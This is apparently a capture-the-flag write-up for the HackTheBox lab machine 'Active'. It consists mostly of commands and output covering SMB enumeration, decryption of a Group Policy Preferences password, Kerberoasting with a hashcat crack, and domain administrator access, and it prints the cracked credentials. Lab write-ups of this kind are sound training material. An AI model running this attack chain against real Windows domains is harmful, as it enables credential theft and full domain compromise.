Setup
mkdir -p ~/ctf/HackTheBox/active/scans; cd ~/ctf/HackTheBox/active
IP Address: 10.10.10.100
echo "10.10.10.100 active.htb" | sudo tee -a /etc/hosts
10.10.10.100 active.htb
Enumeration
nmap -sC -sV -Pn -p- active.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 --min-rate 2500 -oN scans/nmap_2 active.htb
# nmap findings
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5722/tcp open msdfsr syn-ack
47001/tcp open winrm syn-ack
49152/tcp open unknown syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49155/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
49158/tcp open unknown syn-ack
49165/tcp open unknown syn-ack
49166/tcp open unknown syn-ack
49168/tcp open unknown syn-ack
cme smb active.htb -u '' -p '' --shares
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\:
SMB active.htb 445 DC [+] Enumerated shares
SMB active.htb 445 DC Share Permissions Remark
SMB active.htb 445 DC ----- ----------- ------
SMB active.htb 445 DC ADMIN$ Remote Admin
SMB active.htb 445 DC C$ Default share
SMB active.htb 445 DC IPC$ Remote IPC
SMB active.htb 445 DC NETLOGON Logon server share
SMB active.htb 445 DC Replication READ
SMB active.htb 445 DC SYSVOL Logon server share
SMB active.htb 445 DC Users
Inside Replication directory, Which looked like SYSVOL backup . we find a XML under \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\groups 
Using gpp-decrypt
gpp-decrypt <encrypted cpassword >
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
SVC_TGS:GPPstillStandingStrong2k18
Using CrackMapExec we see the access for User SVC_TGS
as SMB We have access to User we can see
user flag
Location: \SVC_TGS\Desktop\ | Flag: ##################################
Privilege Escalation
Now as we have TGS service account: we can try Kerboroasting
we need resolve the system clock w.r.t to machine clock
I Found this on medium for this
sudo timedatectl set-ntp off
sudo rdate -n 10.10.10.100
hashcat -m 13100 hashes_kerberoastingg /usr/share/wordlists/rockyou.txt 
Administrator:Ticketmaster1968
using crackmapexec we check privileges and shares
w3rew01f@w3rew01f ~/ctf/HackTheBox/active cme smb active.htb -u 'Administrator' -p 'Ticketmaster1968'
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
w3rew01f@w3rew01f ~/ctf/HackTheBox/active cme smb active.htb -u 'Administrator' -p 'Ticketmaster1968' --shares
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
SMB active.htb 445 DC [+] Enumerated shares
SMB active.htb 445 DC Share Permissions Remark
SMB active.htb 445 DC ----- ----------- ------
SMB active.htb 445 DC ADMIN$ READ,WRITE Remote Admin
SMB active.htb 445 DC C$ READ,WRITE Default share
SMB active.htb 445 DC IPC$ Remote IPC
SMB active.htb 445 DC NETLOGON READ,WRITE Logon server share
SMB active.htb 445 DC Replication READ
SMB active.htb 445 DC SYSVOL READ Logon server share
SMB active.htb 445 DC Users READ
using smbclient we get root flag
root flag
Location: \Users\Administrator\Desktop\ | Flag: 30e625##################################